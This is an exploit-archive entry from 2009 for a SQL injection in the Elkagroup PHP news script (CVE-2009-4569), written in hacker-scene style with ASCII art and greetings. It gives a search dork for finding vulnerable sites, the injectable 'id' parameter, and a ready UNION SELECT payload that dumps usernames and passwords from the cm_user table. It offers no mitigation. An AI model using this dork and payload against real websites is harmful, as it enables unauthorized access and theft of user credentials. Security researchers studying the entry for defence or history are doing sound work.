[] NeoSense

Elkagroup - SQL Injection

Author: SadHaCkEr
type: webapps
platform: php
port: 
date_added: 2009-12-05 
date_updated:  
verified: 1 
codes: OSVDB-61556;CVE-2009-4569 
tags: 
aliases:  
screenshot_url:  
application_url: 

#Dork : "powered by: elkagroup"

[*]##############################################
[+] |____SadHaCkEr__|__\              #
[+] |______________________|___||\*___          #
[+] |______________________|___||""|"*\___,     #
[+] |______________________|___||""|*"|___||    #
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)*     #
[+]========================================================================================================================================||
[*] About    : elkagroup  SQL Injection Vulnerability (Iranian Script) 																	    ||
[!] Site     : http://www.elkagroup.com                               																		||
[!] Author   : SadHaCkEr                                            																	    ||
[!] Site     : www.alkrsan.net + www.tryag.cc                     																			||
[!] E-Mail   : sad@hack3d.org                     																	        ||
[!] Location : Saudi Arabia                                         																	    ||
[!]=========================================================================================================================================||
[!]                                                   MyWebSite    http://www.sadx.297m.com                           																	||
[!]=========================================================================================================================================||
[!] Exp:
[!]  http://server/news/?id=[SQL]                       																		||
[!]
[!]    [SQL] :                                                        																	    ||
[!]	    UNION SELECT 1,2,3,4,5,6,7,8,9,10,group_concat(username,char(58),password),12,13,14,15,16,17,18,19,20,21,22,23 FROM+cm_user--
[!]                      											  																	    ||
[!]
[!]                                          					    															       	    ||
[!]					Greetz 2 : alkrsan - þAlaooy HaCkEr - S.C.T - RXH - ayaster - Mr.Wolf  and All My Friends
[!]                           										   																	    ||
[!]														    Sad Team
[!]                                    					               																		||
[!]
[!]
[!]=========================================================================================================================================||